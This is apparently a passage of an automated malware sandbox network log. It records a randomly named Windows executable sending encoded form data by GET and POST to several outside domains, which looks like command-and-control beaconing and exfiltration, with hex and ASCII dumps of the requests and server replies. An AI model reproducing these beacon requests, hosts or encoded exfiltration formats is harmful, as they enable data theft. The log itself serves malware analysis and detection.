                                                          Data Raw: 44 30 50 74 73 30 34 3d 77 71 78 66 78 4a 37 32 45 35 56 5a 5a 67 4d 45 67 49 4d 61 53 43 67 2b 6c 65 69 4e 62 57 5a 6f 39 55 52 38 39 43 4d 77 77 68 75 52 68 6a 44 74 4d 6e 76 6c 72 44 41 55 32 4c 75 67 34 34 63 68 70 36 62 58 7a 61 67 53 54 5a 59 46 6b 44 57 50 4f 78 39 45 79 51 30 30 30 69 56 70 66 78 43 44 46 7a 78 61 43 4e 61 77 52 38 73 6d 47 48 54 52 2b 4c 32 6e 43 61 48 42 52 62 65 62 6e 79 32 6e 37 44 74 71 50 6c 7a 71 73 71 73 70 72 4a 53 6d 62 74 74 50 4a 69 52 7a 6c 7a 30 42 4a 74 2f 36 56 78 63 43 32 6c 75 6c 63 63 4a 73 4a 69 49 69 71 44 62 39 30 77 63 64 61 48 66 5a 4c 48 76 42 6c 6b 41 55 6f 7a 67 38 2f 35 6a 4b 75 31 31 4e 44 30 6a 75 37 71 74 56 45 6a 54 6e 77 7a 66 49 74 74 2f 6b 2f 6e 69 71 42 64 61 61 79 4e 63 4c 70 44 32 64 56 31 69 71 31 2f 2f 69 2b 33 74 39 73 6c 67 50 66 4c 52 75 6a 66 5a 6b 44 34 4f 38 2f 38 34 4a 4a 69 50 6c 55 73 30 6a 6d 56 63 66 66 67 61 58 51 4a 50 64 56 51 70 4f 43 2b 4c 46 78 66 2f 66 33 63 56 62 4a 6a 61 4c 2b 4e 37 34 6c 36 37 78 6c 6e 2b 52 58 76 [TRUNCATED]
                                                          Data Ascii: D0Pts04=wqxfxJ72E5VZZgMEgIMaSCg+leiNbWZo9UR89CMwwhuRhjDtMnvlrDAU2Lug44chp6bXzagSTZYFkDWPOx9EyQ000iVpfxCDFzxaCNawR8smGHTR+L2nCaHBRbebny2n7DtqPlzqsqsprJSmbttPJiRzlz0BJt/6VxcC2lulccJsJiIiqDb90wcdaHfZLHvBlkAUozg8/5jKu11ND0ju7qtVEjTnwzfItt/k/niqBdaayNcLpD2dV1iq1//i+3t9slgPfLRujfZkD4O8/84JJiPlUs0jmVcffgaXQJPdVQpOC+LFxf/f3cVbJjaL+N74l67xln+RXvKXa4h/tWEIcdvodnc0eyQdhi877CkiL052NMw5wOIl8pDsRtvdDFvQ4ipLJ6TFkcpdD6gAAEp9dz/1S8KxE87w8bVW/l/yviyzR4qtuu7cGzBt4prlh+/Yz4gGPMx36DnZwJeEKLlxO5L/H9Cb7e1xZWysqjXrUQFnGtmms7qr1HkoFlLe7LYEtIvqXCihTF34m+qTdG37KJoK/X84frjUIDR85rlnTP2EChhZ7wRcW62dsgkxyetOSXPFuU9pCPwcSpctD8yv6LR31g72PW8HkzhrTS4xdmYU45YNrX9M4wpzCspwiPcBxIya9xrCgviueS1DANSBaNO48ldt0gSjsv8ICfh4R2/3XKg6fWxovrBWf7NFKmA9XaBubc4UY/oJAPVCmupxRrsiOFOLsFTMYjXvesZY5Lj5CnfJeRv3Z4nMb8QDp/bDbjS97I561oZpTnggjIWAgXF5OTxKT/M3ABR+OyvXOeUBh8xEsDZEtzio2Y+zroBbDp+iT3Rcf8TL8CV9LohTu6IR4TgZjNqlA6i9XHh4OHztyG2jpAUzmKZOUKot4PJbhapXhsuIW4y20WlEwJmIjA/kaK1KhCZ1/ZKRpuok9XAf2ycWg2rJiSUO4tSLzIU9y0pea3O20vjTaHstN0Dsyukj8yqNiiqTNdJmghldrY+4 [TRUNCATED]
                                                          Jul 13, 2024 00:04:58.235800982 CEST483INHTTP/1.1 404 Not Found
                                                          Server: nginx-reuseport/1.21.1
                                                          Date: Fri, 12 Jul 2024 22:04:58 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Content-Encoding: gzip
                                                          Data Raw: 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f c1 4e c3 30 10 44 ef f9 8a a5 27 38 c4 1b aa 54 e2 60 59 82 26 15 95 42 89 8a 73 e0 68 f0 56 8e da c6 c1 76 08 fc 3d 4e aa 4a 5c 56 9a dd b7 a3 19 7e 53 bc ae e5 7b 5d c2 b3 7c a9 a0 6e 9e aa ed 1a 16 29 e2 b6 94 1b c4 42 16 97 cb 92 65 88 e5 6e 21 12 6e c2 f9 24 b8 21 a5 a3 08 6d 38 91 c8 b3 1c 76 36 c0 c6 0e 9d e6 78 59 26 1c 67 88 7f 58 fd 3b fd dd 8b 7f 4c 54 09 ef 85 34 04 8e be 06 f2 81 34 34 fb 0a 46 e5 a1 8b dc 61 e2 c0 76 10 4c eb c1 93 fb 26 c7 38 f6 93 93 8b 43 69 ed c8 7b f1 d8 ab 4f 43 b8 64 39 5b ad e0 b6 e9 da 9f 3b 78 9b 71 50 01 c6 71 64 de a8 43 7a 1c 7a 4a cf fe c8 7c b0 8e a0 b6 2e c0 43 c6 f1 ea 13 e3 ce 41 63 b4 a9 60 f2 07 ab 25 45 b8 1b 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: eeMN0D'8T`Y&BshVv=NJ\V~S{]|n)Ben!n$!m8v6xY&gX;LT444FavL&8Ci{OCd9[;xqPqdCzzJ|.CAc`%E0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          36192.168.2.64975945.130.41.38805396C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:05:00.043647051 CEST473OUTGET /8rqd/?D0Pts04=9oZ/y9WNG6tRMVJyjLEcdS0HrpeSaX9AmXAuzSAQ4FjvmAKqYk+BgRtg4p2v1sV9pfbK4NMIa5tejy6Eex1rgQRDwh5vDRupVU05UePYOPUqHSHA96iOT4nNXuXT/C+t5WN5HjI=&Q8s=tdcd5h7ptjmdxx HTTP/1.1
                                                          Host: www.shaf-kupe-msk.store
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Jul 13, 2024 00:05:00.780504942 CEST486INHTTP/1.1 404 Not Found
                                                          Server: nginx-reuseport/1.21.1
                                                          Date: Fri, 12 Jul 2024 22:05:00 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Content-Length: 283
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 73 68 61 66 2d 6b 75 70 65 2d 6d 73 6b 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.shaf-kupe-msk.store Port 80</address></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          37192.168.2.6497603.33.130.190805396C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:05:06.023060083 CEST731OUTPOST /ch4t/ HTTP/1.1
                                                          Host: www.quixaclienti.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.quixaclienti.com
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 212
                                                          Referer: http://www.quixaclienti.com/ch4t/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 2b 58 51 4a 76 39 58 45 73 7a 4b 37 54 72 33 56 64 38 5a 61 30 61 69 64 34 72 30 32 48 4d 53 48 6b 51 71 34 51 7a 71 48 62 4b 39 67 70 4d 58 75 45 2b 44 56 31 4e 71 78 64 62 2f 79 67 4c 4c 38 43 76 42 54 42 59 46 74 2b 76 50 34 66 2f 75 37 30 70 67 31 43 42 48 69 77 56 33 73 34 6e 61 34 63 44 56 53 6c 39 57 70 67 74 64 44 50 77 41 53 51 57 42 6a 46 30 5a 61 56 57 38 6d 6e 6f 57 58 4a 48 35 4a 6d 44 45 63 68 6d 52 73 73 2f 44 32 4c 2f 69 66 31 74 6b 56 61 70 50 56 6d 58 42 6e 6a 58 41 49 36 52 45 50 74 65 2f 61 47 65 79 65 32 56 35 68 49 6d 66 4f 33 6f 58 51 56 62 6d 5a 2b 69 4d 70 79 53 44 35 54 34 55 44
                                                          Data Ascii: D0Pts04=+XQJv9XEszK7Tr3Vd8Za0aid4r02HMSHkQq4QzqHbK9gpMXuE+DV1Nqxdb/ygLL8CvBTBYFt+vP4f/u70pg1CBHiwV3s4na4cDVSl9WpgtdDPwASQWBjF0ZaVW8mnoWXJH5JmDEchmRss/D2L/if1tkVapPVmXBnjXAI6REPte/aGeye2V5hImfO3oXQVbmZ+iMpySD5T4UD


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          38192.168.2.6497613.33.130.190805396C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:05:08.562772036 CEST755OUTPOST /ch4t/ HTTP/1.1
                                                          Host: www.quixaclienti.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.quixaclienti.com
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 236
                                                          Referer: http://www.quixaclienti.com/ch4t/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 2b 58 51 4a 76 39 58 45 73 7a 4b 37 53 4c 6e 56 62 66 42 61 6c 4b 69 43 6b 37 30 32 4a 73 54 41 6b 51 6d 34 51 79 65 74 62 63 74 67 70 74 6e 75 46 2f 44 56 37 74 71 78 50 37 2f 7a 2f 37 4c 4a 43 76 4e 6c 42 61 52 74 2b 76 4c 34 66 2b 2b 37 30 5a 63 32 51 68 48 6b 70 46 33 75 31 48 61 34 63 44 56 53 6c 35 47 54 67 74 6c 44 4f 44 6f 53 54 79 74 73 62 6b 5a 64 63 32 38 6d 6a 6f 57 54 4a 48 35 33 6d 43 70 37 68 6b 5a 73 73 39 4c 32 4b 71 43 63 2f 74 6c 51 55 4a 4f 37 68 46 41 30 6c 52 64 6f 78 42 49 4a 73 50 2b 39 44 6f 7a 45 71 6d 35 43 61 32 2f 4d 33 71 50 69 56 37 6d 7a 38 69 30 70 67 46 50 65 63 4d 78 67 70 6a 31 79 7a 4e 65 62 73 69 71 4a 76 62 49 38 76 57 66 2b 65 41 3d 3d
                                                          Data Ascii: D0Pts04=+XQJv9XEszK7SLnVbfBalKiCk702JsTAkQm4QyetbctgptnuF/DV7tqxP7/z/7LJCvNlBaRt+vL4f++70Zc2QhHkpF3u1Ha4cDVSl5GTgtlDODoSTytsbkZdc28mjoWTJH53mCp7hkZss9L2KqCc/tlQUJO7hFA0lRdoxBIJsP+9DozEqm5Ca2/M3qPiV7mz8i0pgFPecMxgpj1yzNebsiqJvbI8vWf+eA==


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          39192.168.2.6497623.33.130.190805396C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:05:11.092232943 CEST1768OUTPOST /ch4t/ HTTP/1.1
                                                          Host: www.quixaclienti.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.quixaclienti.com
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1248
                                                          Referer: http://www.quixaclienti.com/ch4t/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 2b 58 51 4a 76 39 58 45 73 7a 4b 37 53 4c 6e 56 62 66 42 61 6c 4b 69 43 6b 37 30 32 4a 73 54 41 6b 51 6d 34 51 79 65 74 62 63 6c 67 6f 66 44 75 45 63 37 56 36 74 71 78 4d 37 2f 75 2f 37 4c 75 43 75 6c 35 42 61 4e 39 2b 71 58 34 5a 63 6d 37 79 72 34 32 61 68 48 6b 30 56 33 76 34 6e 61 58 63 44 46 65 6c 39 69 54 67 74 6c 44 4f 46 55 53 48 57 42 73 5a 6b 5a 61 56 57 39 6e 6e 6f 58 4f 4a 48 68 42 6d 43 74 42 68 56 35 73 72 64 62 32 4d 5a 71 63 7a 74 6c 65 5a 70 4f 56 68 46 4e 73 6c 56 39 53 78 41 4d 6a 73 4e 69 39 48 34 33 59 36 55 68 66 49 30 50 50 6a 4a 2b 46 56 74 36 5a 69 43 49 42 6c 32 53 69 5a 64 5a 57 78 6e 39 79 34 38 33 6d 6c 6b 65 53 72 75 34 72 74 6b 4f 35 4c 6d 4b 71 76 65 32 68 4b 34 61 6d 36 58 63 74 76 65 76 44 62 58 58 53 69 34 43 63 74 54 31 6b 73 56 77 46 62 6b 51 30 35 57 58 69 34 39 31 49 67 31 66 69 61 34 38 79 67 70 31 7a 46 64 44 50 75 70 4c 31 76 62 45 36 73 43 64 5a 35 53 58 38 5a 50 52 7a 77 35 59 74 47 6a 79 6c 53 51 4d 43 50 37 67 57 53 4e 32 2b 53 37 [TRUNCATED]
                                                          Data Ascii: D0Pts04=+XQJv9XEszK7SLnVbfBalKiCk702JsTAkQm4QyetbclgofDuEc7V6tqxM7/u/7LuCul5BaN9+qX4Zcm7yr42ahHk0V3v4naXcDFel9iTgtlDOFUSHWBsZkZaVW9nnoXOJHhBmCtBhV5srdb2MZqcztleZpOVhFNslV9SxAMjsNi9H43Y6UhfI0PPjJ+FVt6ZiCIBl2SiZdZWxn9y483mlkeSru4rtkO5LmKqve2hK4am6XctvevDbXXSi4CctT1ksVwFbkQ05WXi491Ig1fia48ygp1zFdDPupL1vbE6sCdZ5SX8ZPRzw5YtGjylSQMCP7gWSN2+S7vX9n1r4k6zwguX0bOkSaa0FaGwrosBiQXYdvkKpuwuX5IXkGh9j6NAp66qaCrcBMXtYnl0V7HsSejqKhhHM4hzJErnn0mty7BR4RTTWwjv8XUANJw8WzYzr32p1qioolfxLnNiLCFrExFRnB3+8xOF9rkZPDp+V/RXq/Nlaw0ZXa7GZDMYg6py3Hdexg8yTOcJpUIi+vUleOYFd+tsPZzxXEkr23Xjyt7KVhZxaTpoCjNM+2T8auie3HlSb9298uBfBSMpysAJCQnujgNdoXQrpedThbIvU9ytrJ82CHRSGZRnOl1ipiSLxW9GlKGRWSk+WmUHQiv8ZxpIHQmUpTu2Tofkh1GeJF6sU2X+bKsCfTgYkbUOGzgVTs9HoBFJ9qZQK8dz1ulwWXNPREMjU/e4ixK7oH/A9pNOu1QDNogN3LOeRmjWnaMUBs4P/4Lsp8Pyiwjxa/KFrsf44UIgImnloA5eIc1ZEs3lAXLb3rJL/JY9IdUtKhceGxj/x7v5RigI9Wn1DUNlH21Waa1MwAZyzzcleIs8iJ4uXJnnfDUdknJ/+C6AAtWpNGc4m8A0RI21xvscysrXOTJw5mr4YPMl0kMo+gcrXU6ne/gBtlDRkL2eVaELC1ltctc10EpX7NoWlfAPMxX3VXXf+fSnNogILmlg7DNA+lBm [TRUNCATED]


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          40192.168.2.6497633.33.130.190805396C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:05:14.257771969 CEST470OUTGET /ch4t/?D0Pts04=zV4psITF3VeqDParSPUqyaC99t0+JvfYyjWfRnGJKOsPmd/sGMCn1Nm1D4KIw/eYCOcCLvh/+vn7ften9OcVQgO4yEfBykK1GR1f38/U+4d5GlEoOVJoTF9oaUkt0L+vFB1wnlQ=&Q8s=tdcd5h7ptjmdxx HTTP/1.1
                                                          Host: www.quixaclienti.com
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Jul 13, 2024 00:05:14.849314928 CEST418INHTTP/1.1 200 OK
                                                          Server: openresty
                                                          Date: Fri, 12 Jul 2024 22:05:14 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 278
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 44 30 50 74 73 30 34 3d 7a 56 34 70 73 49 54 46 33 56 65 71 44 50 61 72 53 50 55 71 79 61 43 39 39 74 30 2b 4a 76 66 59 79 6a 57 66 52 6e 47 4a 4b 4f 73 50 6d 64 2f 73 47 4d 43 6e 31 4e 6d 31 44 34 4b 49 77 2f 65 59 43 4f 63 43 4c 76 68 2f 2b 76 6e 37 66 74 65 6e 39 4f 63 56 51 67 4f 34 79 45 66 42 79 6b 4b 31 47 52 31 66 33 38 2f 55 2b 34 64 35 47 6c 45 6f 4f 56 4a 6f 54 46 39 6f 61 55 6b 74 30 4c 2b 76 46 42 31 77 6e 6c 51 3d 26 51 38 73 3d 74 64 63 64 35 68 37 70 74 6a 6d 64 78 78 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?D0Pts04=zV4psITF3VeqDParSPUqyaC99t0+JvfYyjWfRnGJKOsPmd/sGMCn1Nm1D4KIw/eYCOcCLvh/+vn7ften9OcVQgO4yEfBykK1GR1f38/U+4d5GlEoOVJoTF9oaUkt0L+vFB1wnlQ=&Q8s=tdcd5h7ptjmdxx"}</script></head></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          41192.168.2.6497653.33.130.190805396C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:05:20.588257074 CEST749OUTPOST /aoam/ HTTP/1.1
                                                          Host: www.789bet1okvip.solutions
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.789bet1okvip.solutions
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 212
                                                          Referer: http://www.789bet1okvip.solutions/aoam/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 4a 71 54 42 78 78 65 4d 76 73 4e 2f 62 2f 41 35 44 67 43 62 58 46 4f 4e 67 34 39 79 58 5a 35 6a 66 64 38 47 36 6d 55 56 37 70 55 41 64 47 70 55 70 4e 56 32 66 64 2b 4c 67 6f 74 31 48 51 36 48 76 32 43 61 37 47 75 62 76 5a 65 4d 6c 43 37 4b 2f 64 70 46 61 51 77 39 64 53 74 55 49 43 46 76 67 69 55 43 4c 53 5a 53 46 50 70 46 35 71 6b 35 39 2f 74 38 65 7a 37 5a 6e 59 4f 42 75 59 79 64 41 7a 74 57 4c 30 31 47 75 66 41 64 4c 33 76 69 45 35 6d 7a 6b 70 4d 54 71 52 4f 47 62 6a 67 76 76 35 52 43 79 46 61 4a 44 4f 63 6d 39 75 6b 31 43 75 66 4f 71 79 6e 6b 48 68 6e 50 62 74 51 53 35 4e 49 68 6b 56 44 55 54 31 47 48
                                                          Data Ascii: D0Pts04=JqTBxxeMvsN/b/A5DgCbXFONg49yXZ5jfd8G6mUV7pUAdGpUpNV2fd+Lgot1HQ6Hv2Ca7GubvZeMlC7K/dpFaQw9dStUICFvgiUCLSZSFPpF5qk59/t8ez7ZnYOBuYydAztWL01GufAdL3viE5mzkpMTqROGbjgvv5RCyFaJDOcm9uk1CufOqynkHhnPbtQS5NIhkVDUT1GH


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          42192.168.2.6497663.33.130.190805396C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:05:23.159934044 CEST773OUTPOST /aoam/ HTTP/1.1
                                                          Host: www.789bet1okvip.solutions
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.789bet1okvip.solutions
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 236
                                                          Referer: http://www.789bet1okvip.solutions/aoam/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 4a 71 54 42 78 78 65 4d 76 73 4e 2f 5a 66 77 35 47 43 71 62 56 6c 4f 4f 73 59 39 79 64 35 35 6e 66 64 77 47 36 6a 6b 37 37 62 77 41 64 6a 56 55 6f 4a 42 32 50 4e 2b 4c 30 34 73 2f 44 51 36 63 76 32 4f 6b 37 43 71 62 76 64 2b 4d 6c 41 7a 4b 2f 4b 46 43 62 41 77 2f 62 53 74 57 47 69 46 76 67 69 55 43 4c 53 63 61 46 4c 46 46 35 61 30 35 38 61 4e 39 54 54 37 61 7a 49 4f 42 35 49 79 5a 41 7a 74 77 4c 31 35 73 75 64 49 64 4c 31 33 69 45 74 4b 30 2f 35 4d 4a 33 68 4f 58 64 47 4a 31 6f 34 4e 42 36 6e 75 53 59 64 42 46 38 59 6c 76 65 64 66 74 34 69 48 6d 48 6a 2f 39 62 4e 51 34 37 4e 77 68 32 43 50 7a 63 42 6a 6b 4a 72 71 58 68 63 33 43 63 34 61 75 66 5a 47 6b 56 6f 6e 50 51 77 3d 3d
                                                          Data Ascii: D0Pts04=JqTBxxeMvsN/Zfw5GCqbVlOOsY9yd55nfdwG6jk77bwAdjVUoJB2PN+L04s/DQ6cv2Ok7Cqbvd+MlAzK/KFCbAw/bStWGiFvgiUCLScaFLFF5a058aN9TT7azIOB5IyZAztwL15sudIdL13iEtK0/5MJ3hOXdGJ1o4NB6nuSYdBF8Ylvedft4iHmHj/9bNQ47Nwh2CPzcBjkJrqXhc3Cc4aufZGkVonPQw==


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          43192.168.2.6497673.33.130.190805396C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jul 13, 2024 00:05:25.711738110 CEST1786OUTPOST /aoam/ HTTP/1.1
                                                          Host: www.789bet1okvip.solutions
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Origin: http://www.789bet1okvip.solutions
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Content-Length: 1248
                                                          Referer: http://www.789bet1okvip.solutions/aoam/
                                                          User-Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
                                                          Data Raw: 44 30 50 74 73 30 34 3d 4a 71 54 42 78 78 65 4d 76 73 4e 2f 5a 66 77 35 47 43 71 62 56 6c 4f 4f 73 59 39 79 64 35 35 6e 66 64 77 47 36 6a 6b 37 37 62 34 41 64 78 74 55 70 75 74 32 64 64 2b 4c 6f 49 73 38 44 51 37 65 76 79 69 65 37 48 7a 6d 76 62 79 4d 6b 6a 72 4b 6f 6f 39 43 53 41 77 2f 5a 53 74 62 49 43 46 6d 67 6d 35 4c 4c 53 4d 61 46 4c 46 46 35 63 77 35 38 50 74 39 41 6a 37 5a 6e 59 4f 33 75 59 7a 4f 41 7a 31 4f 4c 31 74 57 76 70 45 64 4c 56 6e 69 4a 2b 79 30 7a 35 4d 58 32 68 50 4b 64 47 4d 72 6f 34 51 77 36 6e 32 6f 59 66 64 46 2b 59 68 32 42 5a 48 6b 72 42 44 79 65 67 4b 59 44 37 63 79 33 4d 6c 61 6c 52 4b 41 64 51 48 4f 45 72 61 6a 31 73 2b 43 53 70 76 45 41 50 2b 33 65 62 37 48 48 52 52 50 77 4d 45 52 37 54 64 33 4c 79 70 32 52 4b 77 42 2f 39 57 7a 4f 4f 2f 53 73 42 46 6e 66 4d 57 4e 31 43 36 63 59 77 77 78 44 2b 47 37 52 77 4c 51 77 78 6e 4f 70 73 65 5a 59 33 6f 42 4d 53 42 44 6b 56 74 64 4b 51 68 6d 2f 61 2b 72 75 34 54 36 78 55 45 62 32 57 46 68 34 4f 4a 4c 67 31 46 43 43 4e 4f 65 4c 57 [TRUNCATED]
                                                          Data Ascii: D0Pts04=JqTBxxeMvsN/Zfw5GCqbVlOOsY9yd55nfdwG6jk77b4AdxtUput2dd+LoIs8DQ7evyie7HzmvbyMkjrKoo9CSAw/ZStbICFmgm5LLSMaFLFF5cw58Pt9Aj7ZnYO3uYzOAz1OL1tWvpEdLVniJ+y0z5MX2hPKdGMro4Qw6n2oYfdF+Yh2BZHkrBDyegKYD7cy3MlalRKAdQHOEraj1s+CSpvEAP+3eb7HHRRPwMER7Td3Lyp2RKwB/9WzOO/SsBFnfMWN1C6cYwwxD+G7RwLQwxnOpseZY3oBMSBDkVtdKQhm/a+ru4T6xUEb2WFh4OJLg1FCCNOeLWNi+0a9Ef/zGgJecvXKgC+0k0qIPCGO+QVE8Iu9gqhHpBygkcNMjxdU0NRlPOkaVy1uWpAUL/CTA2aBY0exO4n78V1cb1g+pZb5dlEIwl35kI8F2+HrhFcfyADUtImKpyKN71abdPlnXeCxtsnx2gMlOZEhpwqT4NQz/di342y6sb6EaQOTTMxH088a+xAA9GLMlStT0AF4YVyJRRhXL4I13zo8Q/duclUPt9T347A3xe53Nrz66zWaTHGL3Nu2fbRajw7qaxTJVhq33vALOveZ4teZSugaJT7g3R9HwmmqwWnxPjzLyM0+B288MXbW3UmPk+bP7DsS6xDDBm/isoIQXrHoMN5GLtI65WSJeaEemKSPGcm2st8tR619TtwNDsPPwy+6Zkt/exiBP0GMzr09FvxSSlo4J0cUI9auZ/YUXimu9qhREhjskVbkYXJ9L/Dk3Xd0fk+B2AHb5Di3PRGgJDkfTlO9uRh/qcdiLtbSym1rISsf5UmX2qGWpdafsNlj0Gos+doMaXGsLQddrlkz9UBkTxQo2vn8J8IYHf/0FNQtzwpsDOwp9o